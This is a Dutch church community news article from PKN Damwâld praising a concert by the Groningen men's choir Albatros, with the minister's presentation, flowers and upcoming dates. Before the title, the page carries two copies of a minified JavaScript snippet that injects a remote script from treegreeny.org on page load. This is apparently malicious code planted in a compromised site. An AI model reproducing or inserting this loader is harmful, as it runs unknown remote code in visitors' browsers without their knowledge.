;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mannenkoor Albatros overtuigend en getuigend bij Zingend naar de Zondag - PKN Damwâld

Mannenkoor Albatros overtuigend en getuigend bij Zingend naar de Zondag

Gepubliceerd op: dinsdag 29 oktober 2019

Zaterdagavond 26 oktober. Zingend naar de Zondag had het Groninger Chr. Mannenkoor Albatros uit Nieuwe Pekela uitgenodigd om te zingen in de Ontmoeting in Damwâld. Het was opnieuw de bedoeling om te evangeliseren en onze Heer te loven en te prijzen. Voor zover wij het als mensen kunnen beoordelen, dan zijn die bedoelingen door het koor en alle aanwezigen door zang en samenzang meer dan waargemaakt. Ondanks de nodige concurrentie die avond, was de opkomst van weer erg  groot.

De verwachtingen waren hooggespannen, want dit koor hoort tot de top van Nederland. Wij als organisatie vroegen ons ook af of een veel kleiner koor dan de vorige koren, ook in staat zou zijn om de aanwezigen qua volume en enthousiasme “omver te zingen” en mee te krijgen. En ook houdt niet iedereen van Russische liederen. In overleg was daarom besloten om maar een paar in die taal te zingen. Dus vooraf volop spanning bij ons!!

Om maar met de deur in huis te vallen: het was een in alle opzichten geweldig optreden en dat leidde tot 2 keer toe tot een spontane staande ovatie. Na afloop was iedereen vol lof en was men zeer te spreken over de Russische liederen.

De kwaliteit was bij elk lied hoogstaand daartoe vooral (positief) gedreven en gepusht door hun dirigent Cas Straatman: enthousiast met veel kwaliteit, inzet, drive en regelmatig met zeer directe en individuele aansturing van koorleden. Prachtig om te zien!

Het was afwisselend en gevarieerd, mede door optredens in twee verschillend tenues  (voor en na de pauze), door medewerking van een 2e dirigent, 2e pianist en een zestal solisten. Door hun inbreng, en met prima ondersteuning van de organist Bouko Tiggelaar (met assistent), spatte de klasse er vanaf!

Dat het publiek geïnspireerd werd door die klasse, hoeft geen  betoog. Dit kwam de CD verkoop ongetwijfeld ten goede; men was zeer tevreden over het aantal verkochte CD ‘s.

Het programma bood weer veel samenzang van bekende liederen. Dat moet ook, want zelf zingen is natuurlijk prachtig en dan met zovelen en een indrukwekkend koor. De koorliederen werden steeds kort toegelicht door een koorlid.

Een avond als deze, kan niet zonder leiding en niet zonder gebed en dankgebed, om te bidden om de aanwezigheid, leiding en zegen van onze Heer en om te danken ter afsluiting. De menselijke leiding en presentatie was in handen van dominee Gera den Dikken uit Drachten. Als Groningse geboren, voelde zij zich meteen thuis en veilig op het podium, in de rug gesteund door ruim 40 Groningse koorleden. Het verleidde haar er zelfs toe om een opmerking te maken die, niet direct positief voor de Friezen, toch met gelach werd ontvangen: vraag, wat is de beste plek in Friesland, antwoord, de bushalte voor de bus naar Groningen. Vervolgens leidde zij de avond prima.

Alhoewel niet de bedoeling, denken wij dat zij en het koor voor een prima bijvangst hebben gezorgd:  alle obstakels tussen Groningers en Friezen, als ze er nog waren,  zijn nu wel opgeruimd.

Aan het eind waren er bloemen voor de 2 dirigenten, de organist, pianist en de dominee.

In haar dankwoord noemde zij natuurlijk het koor en alle aanwezigen, maar ook onze plaatselijke bloemist Jilderda voor het schenken van  5 prachtige boeketten en niet in de laatste plaats alle vrijwilligers en de organisatie. Vrijwilligers, die zich direct na afloop weer melden voor de volgende keer, dat is in 1 woord geweldig!!

Samenvattend: een prachtige avond, tot eer van onze Heer, een avond die D.V vervolgd zal worden door meer avonden, de 1e volgend jaar op 28 maart en de daaropvolgende op 10 oktober 2020.

Was u helaas verhinderd dan hebben we de volgende tip voor u: op zaterdag 16 november treedt dit koor op in Garyp, in de Andreastsjerke, aanvang om 20.00 uur en ook hier is de toegang gratis. Ze treden op met Looft den Heer uit Garyp en de Bazuin uit Rottevalle.